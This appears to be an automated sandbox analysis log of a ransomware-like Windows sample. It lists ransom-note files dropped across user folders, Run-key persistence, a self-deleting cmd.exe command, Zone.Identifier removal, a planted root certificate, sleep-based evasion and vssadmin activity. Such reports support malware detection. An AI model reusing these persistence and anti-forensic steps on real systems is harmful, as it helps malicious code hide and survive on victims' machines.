Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ja\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ja\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lt\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lt\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_BR\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_BR\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_PT\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_PT\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ru\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ru\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\th\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\th\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\vi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\vi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_CN\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_CN\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_TW\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_TW\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ar\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ar\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\bg\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\bg\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ca\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ca\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\cs\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\cs\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\da\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\da\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\de\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\de\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\el\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\el\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_GB\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_GB\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_US\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_US\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\et\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\et\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fi\restore_files_gpmus.txtJump to behavior

Boot Survival

Source: C:\Users\user\AppData\Roaming\svcmtr.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34B
Source: C:\Users\user\AppData\Roaming\svcmtr.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34B

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Roaming\svcmtr.exe File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1001\restore_files_gpmus.txt
Source: C:\Users\user\Desktop\0t8amSU3vd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL
Source: C:\Users\user\Desktop\0t8amSU3vd.exe File opened: C:\Users\user\Desktop\0t8amSU3vd.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File opened: C:\Users\user\AppData\Roaming\svcmtr.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\0t8amSU3vd.exe Code function: 0_2_0041B2C0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_0041B2C0
Source: C:\Users\user\AppData\Roaming\svcmtr.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\AppData\Roaming\svcmtr.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\0t8amSU3vd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svcmtr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svcmtr.exe Code function: 2_2_0041B2C0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_0041B2C0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeWindow / User API: threadDelayed 5444
Source: C:\Users\user\AppData\Roaming\svcmtr.exeWindow / User API: threadDelayed 3233
Source: C:\Users\user\Desktop\0t8amSU3vd.exeEvaded block: after key decisiongraph_0-22035
Source: C:\Users\user\AppData\Roaming\svcmtr.exeEvaded block: after key decisiongraph_2-22320
Source: C:\Users\user\Desktop\0t8amSU3vd.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-22377
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-22173
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-22168
Source: C:\Users\user\Desktop\0t8amSU3vd.exe TID: 3528Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svcmtr.exe TID: 3596Thread sleep count: 5444 > 30
Source: C:\Users\user\AppData\Roaming\svcmtr.exe TID: 3596Thread sleep time: -1088800s >= -30000s
Source: C:\Users\user\AppData\Roaming\svcmtr.exe TID: 3620Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svcmtr.exe TID: 3596Thread sleep count: 3233 > 30
Source: C:\Users\user\AppData\Roaming\svcmtr.exe TID: 3596Thread sleep time: -646600s >= -30000s
Source: C:\Windows\System32\vssadmin.exe TID: 3720Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004139B0 _memset,_memset,FindFirstFileW,__wcsdup,wcsstr,wcsstr,wcsstr,wcsstr,_free,FindNextFileW,FindClose,0_2_004139B0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004139B0 _memset,_memset,FindFirstFileW,__wcsdup,wcsstr,wcsstr,wcsstr,wcsstr,_free,FindNextFileW,FindClose,2_2_004139B0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_00413780 GetLogicalDriveStringsW,_memset,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,0_2_00413780
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\AppCache\V607KDWC\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Outlook\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\1033\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\1033\restore_files_gpmus.txt
Source: C:\Users\user\Desktop\0t8amSU3vd.exeAPI call chain: ExitProcess graph end nodegraph_0-22002
Source: C:\Users\user\AppData\Roaming\svcmtr.exeAPI call chain: ExitProcess graph end nodegraph_2-22097
